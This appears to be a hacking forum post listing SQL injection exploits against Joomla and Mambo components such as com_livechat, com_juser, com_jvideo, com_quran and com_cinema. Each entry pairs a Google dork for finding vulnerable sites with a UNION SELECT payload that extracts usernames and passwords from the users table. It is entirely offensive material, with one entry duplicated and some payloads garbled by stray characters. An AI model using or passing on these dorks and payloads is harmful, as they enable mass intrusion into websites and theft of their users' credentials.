joomla sql 注入漏洞!!!
Jomla Live chat
Dork:
allinurl:option=com_livechat
Exploit :
administrator/components/com_livechat/getChat.php?chat=0&last=1=+union+select+
1,unhex(hex(concat(username,0×3a,password))),3,4+from+jos_users
administrator/components/com_livechat/getSavedChatRooms.php?chat=
0&last=1+union+select+1,unhex(hex(concat(username,0×3a,password))),3+from+jos_users
Joomla “option=com_juser”
Example: http://localHost/path/index.php?option=com_juser&task=show_profile&id=70[SQL code]
Dork:
inurl:option=com_juser
exploit:
index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat
(username,0×3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users–
Joomla “com_jvideo”
Example: http://localHost/path/index.php?option=com_jvideo&view=user&user_id=62[SQL code]
Dork :
inurl:option=com_jvideo
inurl:com_jvideo
exploit:
index.php?option=com_jvideo&view=user&user_id=62+and%201=2+union+select+concat
(username,0×3a,password)+from+jos_users
Joomla “option=com_juser”
Example: http://localHost/path/index.php?option=com_juser&task=show_profile&id=70[SQL code]
Dork:
inurl:option=com_juser
exploit:
Code:
index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat
(username,0×3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users–
Joomla com_ewriting
Dorks:
allinurl:”com_ewriting”
Exploit :
Joomla!
index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+
1,2,concat(username,0×3a,password),4,5,6,7,8,9,10+FROM+jos_users–
Mambo
index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+
1,2,concat(username,0×3a,password),4,5,6,7,8,9,10+FROM+mos_users–
Joomla com_simple_review Sql injection
Dork:
inurl:”com_simple_review”
Exploit:
index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws
(username,0×3a,password),2+from+jos_users–
Joomla Qur’an component
DORK :
inurl:”/index.php?option=com_quran”
allinurl:”com_quran”
Exploit :
Mambo
index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat
(username,0×3a,password ),3,4,5+from+mos_users+limit+0,20–
Joomla
index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat
(username,0×3a,password ),3,4,5+from+jos_users+limit+0,20–
Joomla Component com_cinema SQL Injection
DORK
allinurl: “com_cinema”
EXPLOiT 1 :
index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/
**/0,1,0×3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,
31,32,concat(username,0×3a,password)/**/from/**/jos_users/*
EXPLOiT 2 :
[/i]index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/
**/0,1,0×3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,29,29,30,
concat(username,0×3a,password)/**/from/**/jos_users/*
Joomla Component joomradio Remote SQL Injection
DORK:
inurl:com_joomradio
Exploit :
Code:
index.php?option=com_joomradio&page=show_video&id=-1 UNION SELECT user(),concat(username,0×3a,password),user(),user(),user(),user(),user() FROM jos_users–